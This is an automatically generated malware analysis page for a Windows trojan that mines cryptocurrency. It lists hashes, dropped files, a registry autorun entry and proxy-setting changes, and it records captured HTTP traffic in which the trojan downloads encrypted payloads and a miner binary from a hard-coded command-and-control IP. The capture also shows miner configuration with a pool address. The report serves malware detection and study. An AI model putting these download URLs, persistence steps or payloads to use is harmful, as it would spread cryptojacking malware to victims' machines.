Gen.Variant.Kazy.454509_f4cd8daa5f

by malwarelabrobot on November 2nd, 2016 in Malware Descriptions.

Trojan.Win32.Miner.sugf (Kaspersky), Gen:Variant.Kazy.454509 (B) (Emsisoft), Gen:Variant.Kazy.454509 (AdAware), Installer.Win32.InnoSetup.FD, Trojan.Win32.Iconomon.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Installer


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: f4cd8daa5f80438e17d003fa8d2d9468
SHA1: 506d33fbfcb85d467da1f0d6a494beda01463802
SHA256: 00d2bf4b9ddf8d128ae26cda81cea799030dd9460a8f0fc924d2dee385ca9351
SSDeep: 196608:fukIKMqJ8q1x/KR8yjzJmXY72chyqW2w4A9IU:2kIKMqJ8q1xBywXe1MT2HAN
Size: 6749215 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-09-04 00:25:24
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

mic.exe:264
yfRl.exe:2924
%original file name%.exe:2704
setup.exe:2928

The Trojan injects its code into the following process(es):

setup.tmp:2060

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process mic.exe:264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\yfRl.exe (48492 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\BuocZykb\Ux (1 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\yfRl.exe (0 bytes)

The process yfRl.exe:2924 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\BuocZykb\F (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\10[1].htm (879 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\32_2[1].mining (283058 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\BuocZykb\RlyfP7 (306 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\4DR\options (152 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\BuocZykb\yfR (226 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\BuocZykb\lRfy (36 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\4DR\lel.arch (235493 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\BuocZykb\fylRx (226 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\4DR\svcnost.exe (269510 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\BuocZykb\VZaqC (879 bytes)

The process %original file name%.exe:2704 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\551b45c5a2e3ajn57690b0469d26f1a3\mic.exe (24537 bytes)

The Trojan deletes the following file(s):

C:\551b45c5a2e3ajn57690b0469d26f1a3\mic.exe (0 bytes)

The process setup.tmp:2060 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-O9TRG.tmp\isgsg.dll (35 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-O9TRG.tmp\ISDone.dll (3681 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-O9TRG.tmp\_isetup\_shfoldr.dll (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-O9TRG.tmp\BASS.dll (601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-O9TRG.tmp\CallbackCtrl.dll (4 bytes)

The process setup.exe:2928 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-TV3I5.tmp\setup.tmp (50 bytes)

Registry activity

The process mic.exe:264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"yRF" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\yfRl.exe /yfRlFxP79ACugWTUxUTlVaBNuyoJcpZUyMkebi17VoZjaPqHCA4cxDScRhqpiAG"

The process yfRl.exe:2924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\yfRl_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\yfRl_RASMANCS]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\yfRl_RASAPI32]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\yfRl_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\yfRl_RASAPI32]
"FileDirectory" = "%windir%\tracing"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process %original file name%.exe:2704 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process setup.tmp:2060 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\RestartManager\Session0000]
"Sequence" = "1"
"Owner" = "0C 08 00 00 54 E1 89 D3 01 34 D2 01"
"SessionHash" = "93 5F 14 FF 97 17 AA D7 5B 67 40 5D 4B 42 F3 46"

Dropped PE files

MD5 File path
e8c7565c5100abfa25ff00c45fa2e0dd c:\551b45c5a2e3ajn57690b0469d26f1a3\mic.exe
b2d487100289cdbbfbab5592f69c74f0 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-5PND6.tmp\setup.tmp
8005750ec63eb5292884ad6183ae2e77 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-OD0UQ.tmp\BASS.dll
f07e819ba2e46a897cfabf816d7557b2 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-OD0UQ.tmp\CallbackCtrl.dll
4feafa8b5e8cdb349125c8af0ac43974 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-OD0UQ.tmp\ISDone.dll
92dc6ef532fbb4a5c3201469a5b5eb63 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-OD0UQ.tmp\_isetup\_shfoldr.dll
09974eaff6defadde38b1328754dbe09 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-OD0UQ.tmp\isgsg.dll
e8c7565c5100abfa25ff00c45fa2e0dd c:\Users\"%CurrentUserName%"\AppData\Roaming\rWF5t\O2Og.exe
dc66679be16d4e98a08a333e7070ed18 c:\Users\"%CurrentUserName%"\AppData\Roaming\rWF5t\uE4st2b0\svcnost.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 132923 133120 4.59349 5330425dbd024f751d37953da42139de
.rdata 139264 38724 38912 3.27133 8fe23fff274de57efa3108c2916a28dc
.data 180224 15872 7168 2.66632 b7e49abe645b61cdda21d1d84b193153
.rsrc 196608 129352 129536 5.3618 9297de865554b4ca00e08d84e6366a31
.reloc 327680 36194 36352 1.4767 99c04a359954fb1b7dc6216091ec8c11

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
275c5eeae2c1637aa9b35f63a487c2fe

URLs

URL IP
hxxp://api.vk.com/method/wall.get.xml 87.240.165.66
hxxp://api.vk.com/method/wall.get.xml?count=1&owner_id=-76378965 87.240.165.66
hxxp://82.146.54.187/reborn_updates/10_a.lalka.raum_encrypted
hxxp://82.146.54.187/wKUyVIeW5Ei0N670Vu1r47UtOOb8e3uAwKUyVIeW5Ei0N670Vu1r47UtOOb8e3uA/0/0/0/5/10/
hxxp://82.146.54.187/bitfury_updates/61.update.raum
hxxp://82.146.54.187/CSD/32_2.mining
dns.msftncsi.com


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /method/wall.get.xml HTTP/1.0
Host: api.vk.com
Cache-Control: max-age=0, no-store
User-agent: Mozilla/4.8 [en] (Windows NT 5.0; U)


HTTP/1.1 200 OK
Server: Apache
Date: Tue, 01 Nov 2016 05:36:05 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 371
Connection: close
X-Powered-By: PHP/3.6865
Set-Cookie: remixlang=1; expires=Sat, 11 Nov 2017 23:56:04 GMT; path=/; domain=.vk.com
Pragma: no-cache
Cache-control: no-store
<?xml version="1.0" encoding="utf-8"?>.<error>. <error_
code>100</error_code>. <error_msg>One of the parameters
 specified was missing or invalid: owner_id is undefined</error_msg
>. <request_params list="true">.  <param>.   <key>
;oauth</key>.   <value>1</value>.  </param>.  
<param>.   <key>method</key>.   <value>wall.ge
t.xml</value>.  </param>. </request_params>.</err
or>...



GET /bitfury_updates/61.update.raum HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 82.146.54.187
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Date: Tue, 01 Nov 2016 05:36:11 GMT
Server: Apache/2.2.22 (@RELEASE@)
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /bi
tfury_updates/61.update.raum was not found on this server.</p>.&
lt;hr>.<address>Apache/2.2.22 (@RELEASE@) Server at 82.146.54
.187 Port 80</address>.</body></html>...



GET /method/wall.get.xml?count=1&owner_id=-76378965 HTTP/1.0
Host: api.vk.com
Cache-Control: max-age=0, no-store
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20060127 Netscape/8.1


HTTP/1.1 200 OK
Server: Apache
Date: Tue, 01 Nov 2016 05:36:06 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 1567
Connection: close
X-Powered-By: PHP/3.6865
Set-Cookie: remixlang=1; expires=Mon, 30 Oct 2017 23:53:13 GMT; path=/; domain=.vk.com
Pragma: no-cache
Cache-control: no-store
<?xml version="1.0" encoding="utf-8"?>.<response list="true"&
gt;. <count>61</count>. <post>.  <id>281</i
d>.  <from_id>-76378965</from_id>.  <to_id>-76378
965</to_id>.  <date>1424566591</date>.  <post_typ
e>post</post_type>.  <text>pgDYB3vWx2LKCZ43nJm3odK2nsW3
nJGWodq0mZWVz3jVDxbFAwrZpGO8DxbKyxrLx2LUzM8 cGK8DMvYC2LVBJ44odWVDMvYC2
LVBJ4kctXSAw5RpMH0Dha6lY84mI4XndyUntqUmtG3l3jLyM9YBL91CgrHDgvZlZeWx2eU
BgfSA2eUCMf1Bv9LBMnYExb0zwq8l2XPBMS cGK8zw5JCNLWDgLVBL9RzxK nJy2x1jHDw
1xAxrOtwvFnJy2pc9LBMnYExb0Aw9Ux2TLEt4kpc91CgrHDgvFAw5MBZ4kphjLz3DYAxrL
x2XPBMS Ahr0CdOVlZKYlJyZlJeWmc4XmJGVDg9VBhmVuMvNv3jPDgvYlMv4zs5YyxvTx2
vUy3j5ChrLzdWVCMvND3jPDgvFBgLUAZ4kpg1PBMLUz19PBMzVpGOjpdmYyML0pGOjctXU
DMLKAwe Ahr0CdOVlZGYlJe0nI41nc4XodCVq1nelZmYxZeUBwLUAw5Npc9UDMLKAwe cG
KjphjHzgvVBJ5ODhrWoI8VodiUmtq2lJu0lJe4nY9du0qVmZjFms5TAw5PBMC8l3jHzgvV
BJ4kcqK8B3rOzxi Ahr0CdOVlZGYlJe0nI41nc4XodCVq1nelZmYxZeUBwLUAw5Npc9VDg
HLCJ4kctWVmZjIAxq cGK8nJrIAxq cGKjpg52AwrPyt5ODhrWoI8VodiUmtq2lJu0lJe4
nY9du0qVnJrFnY5TAw5PBMC8l252AwrPyt4kcqK8CMfKzw9UpMH0Dha6lY84mI4XndyUnt
qUmtG3l0ntrc82nf83lM1PBMLUzZWVCMfKzw9UpGOjctXVDgHLCJ5ODhrWoI8VodiUmtq2
lJu0lJe4nY9du0qVnJrFnY5TAw5PBMC8l290AgvYpGOjpc82ngjPDd4kpc9TAw5PBMDFAw
5MBZ4kpgjHy2T1Cf91CMW Ahr0CdOVlZeUBgfZDg5Pz2H0lNO4lNj1lZWVyMfJA3vWx3vY
Bd4kphzRx3rPBwvVDxq nJa8l3zRx3rPBwvVDxq cJXJAgvJA2LUx3nPBwvVDxq mtiWpc
9JAgvJA2LUx3nPBwvVDxq cJXJAgvJA2LUx3rPBwvVDxq mtiWpc9JAgvJA2LUx3rPBwvV
Dxq cJXZAwDUpM51BgW8l3nPz24 </text>.  <comments>.   &l
<<< skipped >>>


GET /reborn_updates/10_a.lalka.raum_encrypted HTTP/1.0
Host: 82.146.54.187
Cache-Control: max-age=0, no-store
User-agent: Mozilla/4.8 [en] (Windows NT 5.0; U)


HTTP/1.1 200 OK
Date: Tue, 01 Nov 2016 05:36:06 GMT
Server: Apache/2.2.22 (@RELEASE@)
Last-Modified: Sun, 22 Feb 2015 00:54:42 GMT
ETag: "253008-2f200-50fa2bb243c7e"
Accept-Ranges: bytes
Content-Length: 193024
Connection: close
Content-Type: text/plain; charset=UTF-8
{l._QaumSith.._6.6666_Ra5mWithMe_666666_RaumWithMe_666666_Ra.mWizw.k_.
?...7..@!.>.T.?.8DW[.UW1<..M5.T.8.._X.rye.?...ydybie_666665...2.
..3........6...............6..9....mt.......H.`...........lM}.w....wv.
[email protected]_U7....WithMe_666666_RaumWithMe.s66z73_.I.9WithMe_6.647=^
Yau.VitrLe_666..6_RqumWyvhMe.66&666]RapmVithMeZ676666_R1vmWmthMe_6466.
6_Bau}With]e_&66666_BaumWithMe_6..46._Rau.Ui.iMe_666666_RaumWithMe\6.(
666_RaumWithMe_666666_RaumWithMe_6.I46v_RaumWithMe_&46.76_RaumWithMe_6
66666_RaumWiZ.(. 666..7_RqumW.uhMa_666666_RaumWiThM.qDRWBW6_..umWyvhM.
_66.766_RaumWithMe.66v.RW 3aum7TthM.]66*666.PaumWithMe_666v66.|...4ith
.d_66.466]Rau.UithMe_666666_.au-y..."._6.w666_Qau/Wit.Oe_666666_Raum.i
t*Me_666666_RaumWithMe_666666_RaumWithMe_666666_RaumWithMe_666666_Raum
WithMe_666666_RaumWithMe_666666_RaumWithMe_666666_RaumWithMe_666666_Ra
umWithMe_666666_RaumWithMe_666666_RaumWithMe_666666_RaumWithMe_666666_
RaumWithMe_666666_RaumWithMe_666666_RaumWithMe_666666_RaumWithMe_66666
6_RaumWithMe_666666_RaumWithMe_666666_RaumWithMe_6...w6.t.um..\;.2l..S
..CS..........y66.k>o.Y....m.=.../..z/.d..l.YR..^^.J9I2..)[J.v..9..
tPa.P9%s..$.....-.6.{..s..^Zau.*.t.0.*>\2o. ^Ra.n.,.i.%[.r."..^Ra..
..N....{...J. VZ..q.w..a.r/v.z/g.$.."..Jce_...CF..V...........5a.v2.'.
.!OQ..A.^.f..s.*&Z..'.1..(...J.I2d..V.T.<l.!Fv.z/.........YhM...C..
.2.'.. ..w..a.J...J.{...(..9........s.....?.......{........0..$....[o.
..{>l..t..mw../S..2....VX.UX-...r.|:.|&C...d-W..5E......K..Q.5iT...
9|.F:=.....eL.o>{,.3.....66....;^it....h..R.;_Rau6..#?...66.c..
<<< skipped >>>


GET /reborn_updates/10_a.lalka.raum_encrypted HTTP/1.0
Host: 82.146.54.187
Cache-Control: max-age=0, no-store
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20060127 Netscape/8.1


HTTP/1.1 200 OK
Date: Tue, 01 Nov 2016 05:36:06 GMT
Server: Apache/2.2.22 (@RELEASE@)
Last-Modified: Sun, 22 Feb 2015 00:54:42 GMT
ETag: "253008-2f200-50fa2bb243c7e"
Accept-Ranges: bytes
Content-Length: 193024
Connection: close
Content-Type: text/plain; charset=UTF-8
{l._QaumSith.._6.6666_Ra5mWithMe_666666_RaumWithMe_666666_Ra.mWizw.k_.
?...7..@!.>.T.?.8DW[.UW1<..M5.T.8.._X.rye.?...ydybie_666665...2.
..3........6...............6..9....mt.......H.`...........lM}.w....wv.
[email protected]_U7....WithMe_666666_RaumWithMe.s66z73_.I.9WithMe_6.647=^
Yau.VitrLe_666..6_RqumWyvhMe.66&666]RapmVithMeZ676666_R1vmWmthMe_6466.
6_Bau}With]e_&66666_BaumWithMe_6..46._Rau.Ui.iMe_666666_RaumWithMe\6.(
666_RaumWithMe_666666_RaumWithMe_6.I46v_RaumWithMe_&46.76_RaumWithMe_6
66666_RaumWiZ.(. 666..7_RqumW.uhMa_666666_RaumWiThM.qDRWBW6_..umWyvhM.
_66.766_RaumWithMe.66v.RW 3aum7TthM.]66*666.PaumWithMe_666v66.|...4ith
.d_66.466]Rau.UithMe_666666_.au-y..."._6.w666_Qau/Wit.Oe_666666_Raum.i
t*Me_666666_RaumWithMe_666666_RaumWithMe_666666_RaumWithMe_666666_Raum
WithMe_666666_RaumWithMe_666666_RaumWithMe_666666_RaumWithMe_666666_Ra
umWithMe_666666_RaumWithMe_666666_RaumWithMe_666666_RaumWithMe_666666_
RaumWithMe_666666_RaumWithMe_666666_RaumWithMe_666666_RaumWithMe_66666
6_RaumWithMe_666666_RaumWithMe_666666_RaumWithMe_6...w6.t.um..\;.2l..S
..CS..........y66.k>o.Y....m.=.../..z/.d..l.YR..^^.J9I2..)[J.v..9..
tPa.P9%s..$.....-.6.{..s..^Zau.*.t.0.*>\2o. ^Ra.n.,.i.%[.r."..^Ra..
..N....{...J. VZ..q.w..a.r/v.z/g.$.."..Jce_...CF..V...........5a.v2.'.
.!OQ..A.^.f..s.*&Z..'.1..(...J.I2d..V.T.<l.!Fv.z/.........YhM...C..
.2.'.. ..w..a.J...J.{...(..9........s.....?.......{........0..$....[o.
..{>l..t..mw../S..2....VX.UX-...r.|:.|&C...d-W..5E......K..Q.5iT...
9|.F:=.....eL.o>{,.3.....66....;^it....h..R.;_Rau6..#?...66.c..
<<< skipped >>>


GET /CSD/32_2.mining HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 82.146.54.187
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 01 Nov 2016 05:36:11 GMT
Server: Apache/2.2.22 (@RELEASE@)
Last-Modified: Thu, 19 Feb 2015 01:22:53 GMT
ETag: "252fe5-22ecc3-50f66c6688073"
Accept-Ranges: bytes
Content-Length: 2288835
Connection: close
Content-Type: video/unknown
.options.....svcnost.exe...".<pre_exe></pre_exe>..<para
meters>204.27.62.234 9549 2R8cE13emG2DejVioZ1oTh5uwnTzDbMnV9ydZZFFb
8E32HuGLs3 2</parameters>..<main_exe>svcnost.exe</main_
exe>MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
........."..............L...."..2...........`....@....................
......p#.....?."....... ..............................0#..............
................................................`#....................
.44#..............................text....K.......L..................`
.p`.data....{...`...|[email protected].........
[email protected]@/4...........`[email protected]@.bss.....1...."..
.....................`..idata.......0#......."[email protected]...
.<....P#......."[email protected].... ....`#......."...........
[email protected].................................................................
......................................................................
......................................................................
......................................................................
..........................................................&......'....
...1.f.=..@.MZ....c.........c.........c.........c.....th...b....c...tJ
..$......t....$......}......c... c... [email protected].......&
......$.....Tt....f...<.@[email protected][email protected]?f......j....
........].........1.......K....v...$..Q......1......yt...,........
<<< skipped >>>


GET /xTVBuocZykb1VZaqC4xSRqiGyRFP9CgTxTVBuocZykb1VZaqC4xSRqiGyRFP9CgT/0/0/0/5/10/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 82.146.54.187
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 01 Nov 2016 05:36:11 GMT
Server: Apache/2.2.22 (@RELEASE@)
X-Powered-By: PHP/5.3.3
Content-Length: 879
Connection: close
Content-Type: text/html; charset=UTF-8
<xTVBu>...<ouZcT>48</ouZcT>...<cZuoV>hXXp://82
.146.54.187/bitfury_updates/61.update.raum</cZuoV>...<ZcouB&g
t;666AnotherPassword666</ZcouB>...<qaZV1>....<C4xSR>
null</C4xSR>....<cZuoV>hXXp://82.146.54.187/tools/66.fix&l
t;/cZuoV>...</qaZV1>..</xTVBu>..<TxBVo>...<ykb
1V>....<ky1bZ>X11</ky1bZ>....<ouZcT>1</ouZcT&g
t;....<cZuoV>hXXp://lololohost.com/X11.arch</cZuoV>...<
/ykb1V>...<ykb1V>....<ky1bZ>M7M</ky1bZ>....<ou
ZcT>1</ouZcT>....<cZuoV>hXXp://lololohost.com/M7M.arch&
lt;/cZuoV>...</ykb1V>..</TxBVo>..<VBxTc>...<b1
yka>....<VZaqy>X11:params for nvidia x32</VZaqy>....<
;ZVqak>X11:params for radeon x32</ZVqak>....<aqVZb>X11:
params for other x32</aqVZb>...</b1yka>...<1bkyq>...
.<VZaqy>M7M:params for nvidia x64</VZaqy>....<ZVqak>
M7M:params for radeon x64</ZVqak>....<aqVZb>M7M:params for
 other x64</aqVZb>...</1bkyq>..</VBxTc>..<BVTxZ&g
t;hXXp://82.146.54.187/,hXXp://da0.eu/</BVTxZ>..<uocZx>10&
lt;/uocZx>..



GET /bitfury_updates/61.update.raum HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 82.146.54.187
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Date: Tue, 01 Nov 2016 05:36:21 GMT
Server: Apache/2.2.22 (@RELEASE@)
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /bi
tfury_updates/61.update.raum was not found on this server.</p>.&
lt;hr>.<address>Apache/2.2.22 (@RELEASE@) Server at 82.146.54
.187 Port 80</address>.</body></html>...



GET /wKUyVIeW5Ei0N670Vu1r47UtOOb8e3uAwKUyVIeW5Ei0N670Vu1r47UtOOb8e3uA/0/0/0/5/10/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 82.146.54.187
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 01 Nov 2016 05:36:21 GMT
Server: Apache/2.2.22 (@RELEASE@)
X-Powered-By: PHP/5.3.3
Content-Length: 879
Connection: close
Content-Type: text/html; charset=UTF-8
<wKUyV>...<IVWeK>48</IVWeK>...<eWVIU>hXXp://82
.146.54.187/bitfury_updates/61.update.raum</eWVIU>...<WeIVy&g
t;666AnotherPassword666</WeIVy>...<076N0>....<Vu1r4>
null</Vu1r4>....<eWVIU>hXXp://82.146.54.187/tools/66.fix&l
t;/eWVIU>...</076N0>..</wKUyV>..<KwyUI>...<5Ei
0N>....<E50i6>X11</E50i6>....<IVWeK>1</IVWeK&g
t;....<eWVIU>hXXp://lololohost.com/X11.arch</eWVIU>...<
/5Ei0N>...<5Ei0N>....<E50i6>M7M</E50i6>....<IV
WeK>1</IVWeK>....<eWVIU>hXXp://lololohost.com/M7M.arch&
lt;/eWVIU>...</5Ei0N>..</KwyUI>..<UywKe>...<i0
5E7>....<N6705>X11:params for nvidia x32</N6705>....<
;6N07E>X11:params for radeon x32</6N07E>....<70N6i>X11:
params for other x32</70N6i>...</i05E7>...<0iE50>...
.<N6705>M7M:params for nvidia x64</N6705>....<6N07E>
M7M:params for radeon x64</6N07E>....<70N6i>M7M:params for
 other x64</70N6i>...</0iE50>..</UywKe>..<yUKwW&g
t;hXXp://82.146.54.187/,hXXp://da0.eu/</yUKwW>..<VIeWw>10&
lt;/VIeWw>..



GET /CSD/32_2.mining HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 82.146.54.187
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 01 Nov 2016 05:36:21 GMT
Server: Apache/2.2.22 (@RELEASE@)
Last-Modified: Thu, 19 Feb 2015 01:22:53 GMT
ETag: "252fe5-22ecc3-50f66c6688073"
Accept-Ranges: bytes
Content-Length: 2288835
Connection: close
Content-Type: video/unknown
.options.....svcnost.exe...".<pre_exe></pre_exe>..<para
meters>204.27.62.234 9549 2R8cE13emG2DejVioZ1oTh5uwnTzDbMnV9ydZZFFb
8E32HuGLs3 2</parameters>..<main_exe>svcnost.exe</main_
exe>MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
........."..............L...."..2...........`....@....................
......p#.....?."....... ..............................0#..............
................................................`#....................
.44#..............................text....K.......L..................`
.p`.data....{...`...|[email protected].........
[email protected]@/4...........`[email protected]@.bss.....1...."..
.....................`..idata.......0#......."[email protected]...
.<....P#......."[email protected].... ....`#......."...........
[email protected].................................................................
......................................................................
......................................................................
......................................................................
..........................................................&......'....
...1.f.=..@.MZ....c.........c.........c.........c.....th...b....c...tJ
..$......t....$......}......c... c... [email protected].......&
......$.....Tt....f...<.@[email protected][email protected]?f......j....
........].........1.......K....v...$..Q......1......yt...,........
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_2704:

.text
`.rdata
@.data
.rsrc
@.reloc
j.Yf;
_tcPVj@
.PjRW
Bv.SCv
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GetProcessWindowStation
operator
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Mozilla/5.0 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)
Mozilla/4.8 [en] (Windows NT 5.0; U)
Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20060127 Netscape/8.1
